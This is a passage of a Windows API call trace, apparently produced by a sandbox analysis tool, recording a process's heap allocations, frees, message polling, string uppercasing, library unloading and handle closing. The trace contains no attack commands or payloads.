(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.225] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.226] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.226] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.227] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.227] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.227] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.228] FreeLibrary (hLibModule=0x74d40000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.228] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.228] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0161.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0161.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.230] CloseHandle (hObject=0x170) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.231] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.232] CloseHandle (hObject=0x1e8) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.235] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: 